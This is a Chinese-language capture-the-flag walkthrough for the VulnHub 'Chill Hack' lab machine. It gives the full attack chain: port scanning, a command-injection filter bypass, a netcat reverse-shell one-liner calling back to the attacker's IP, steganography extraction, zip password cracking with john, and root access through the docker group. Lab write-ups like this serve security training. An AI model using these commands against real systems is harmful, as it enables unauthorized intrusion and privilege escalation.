vulnhub Chill Hack

Chill Hack

基础信息

思路比较清晰明确,容易操作
vulnhub Chill Hack

靶机搭建

将镜像导入之后成功运行会显示该图片
vulnhub Chill Hack

主机发现与端口扫描

因为靶机与kali处于同一个网段可以使用nmap进行发现并进行端口扫描

nmap 192.168.1.0/24
nmap -sV -p- -A 192.168.1.106

发现开放了21 22 80 端口,对端口进行详细的扫描
vulnhub Chill Hackvulnhub Chill Hack

首先尝试连接21端口查看能否获得一些信息
用户名:anonymous 没有密码
发现存在note.txt
vulnhub Chill Hack

下载文件

get note.txt

vulnhub Chill Hack

发现没有很多有用的信息,进入80端口查看
没有发现可利用的信息
vulnhub Chill Hack

使用dirb爬取网页,发现了熟悉的页面
http://192.168.1.106/secret/
vulnhub Chill Hack

输入命令看看命令能否使用,输入id时正常返回页面但是当想要获取目录信息时会发现ls命令被过滤

vulnhub Chill Hackvulnhub Chill Hack

尝试进行绕过

id;ls

发现命令成功执行

vulnhub Chill Hack

可以使用这种方法反弹shell

id;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.107 1234 >/tmp/f

获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

使用LinEnum爬取文件查看是否有可以利用的文件
首先开启临时端口将LinEnum下载到靶机的/tmp目录下
赋予权限并执行该脚本

python -m SimpleHTTPServer 8000
wget http://192.168.1.107:8000/LinEnum.sh
chmod 777 LinEnum.sh
 ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

发现了个有意思的文件,进入目录进行查看
vulnhub Chill Hack

发现在该文件中存在一张图片我们可以下载下来进行查看

vulnhub Chill Hack

搭建临时网站

python3 -m http.server 8001
wget http://192.168.1.108:8001/images/hacker-with-laptop_23-2147985341.jpg

成功下载
vulnhub Chill Hacksteghide使用查看图片中是否含有隐藏文件,将文件下载下来

steghide info hacker-with-laptop_23-2147985341.jpg 
steghide extract -sf hacker-with-laptop_23-2147985341.jpg 

提取出一个压缩包尝试解压发现需要密码

vulnhub Chill Hackvulnhub Chill Hack

使用john进行爆破

zip2john backup.zip > backup.john
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john
john backup.john --show

获得密码:pass1word
vulnhub Chill Hack

再次对压缩包进行解压,这次解压成功
查看减压文件,发现使用base64加密的密码

vulnhub Chill Hack解密之后密码为:[email protected]
进入/home目录下查看用户使用改密码尝试进行登录
vulnhub Chill Hack

提权

因为之前反弹获得的shell输入命令全部都是双写看着不习惯
因为开放了22端口可以使用ssh进行远程连接

vulnhub Chill Hacksudo -l查看可使用命令

vulnhub Chill Hack

进入该目录使用ls -al 发现可执行脚本
vulnhub Chill Hack执行之后发现好像没什么用,只能尝试其他方法

vulnhub Chill Hack通过id发现anurodh属于docker用户组
使用该命令
vulnhub Chill Hack

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功
vulnhub Chill Hack进入root目录获取flag
vulnhub Chill Hack

相关推荐: 记一次由sql注入到拿下域控的渗透测试实战演练(上)

本次渗透总流程: 1.从一个web页面发现SQL注入并可以通过注入getshell 2.通过对webshell的提权成功拿下服务器管理员权限 3.通过内网穿透成功连接目标服务器的3389远程桌面服务 4.通过在目标服务器上安装并使用nmap完成信息收集,为接下…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/articles/web/6248.html

发表评论

邮箱地址不会被公开。 必填项已用*标注